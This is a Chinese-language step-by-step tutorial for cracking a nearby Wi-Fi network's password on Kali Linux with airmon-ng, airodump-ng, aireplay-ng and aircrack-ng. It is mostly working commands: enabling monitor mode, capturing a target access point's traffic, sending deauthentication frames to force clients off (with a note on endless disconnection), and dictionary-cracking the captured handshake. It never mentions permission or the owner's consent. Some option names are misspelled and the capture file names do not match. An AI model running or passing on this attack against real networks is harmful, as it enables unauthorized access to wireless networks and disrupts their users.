文章目录
- 1.1 准备无线网卡
- 1.2 无线网卡接入虚拟机
- 1.3 查看无线网卡信息
- 1.4 开启无线网卡监听模式
- 1.5 监听周围无线网络信息
- 1.6 如果不能监听,需要设置Monitor模式
- 1.7 监听感兴趣的无线网络
- 1.8 得到握手包
- 1.9 获取密码
1.1 准备无线网卡
注意kail支持的哪些芯片的无线网卡
1.2 无线网卡接入虚拟机
1.3 查看无线网卡信息
root@KALI-EXPLOIT:~# iwconfig
root@KALI-EXPLOIT:~# airmon-ng
1.4 开启无线网卡监听模式
root@KALI-EXPLOIT:~# airmon-ng start wlan0(根据上一步查看到的设备名)
默认是接入模式,这个命令是开启监听模式
1.5 监听周围无线网络信息
root@KALI-EXPLOIT:~# airodump-ng wlan0mon(根据上一步的到的设备名)
1.6 如果不能监听,需要设置Monitor模式
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
这个是可能会出现的问题,没有遇到选择跳过
1.7 监听感兴趣的无线网络
root@KALI-EXPLOIT:~# airodump-ng -c 6 --bsssid AP's MAC -w wep wlan0mon
-c 后面的6为AP工作频道,-bissid 面为AP MAC地址
-w 后面的wep是抓下来的数据包DATA保存的文件名
1.8 得到握手包
保持上一步的窗口不关,新开一个窗口,执行以下命令:
aireplay-ng -a AP-MAC -c 切断客户端的MAC(重新连接) -0 5 (发送次数一般5次就够) wlan0mon(网卡名称)
截图: 成功获取握手包
解析: -0为模式的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开)
-a AP-MAC指定无线AP的mac地址,即为该无线网的bssid值, -c 为客户端mac,即为STATION值
1.9 获取密码
aircrack-ng tmp-01.cap -w /tmp/passwd.txt
截图:
破解成功后会出现:KEY FOUND!后中括号中间就是wifi密码
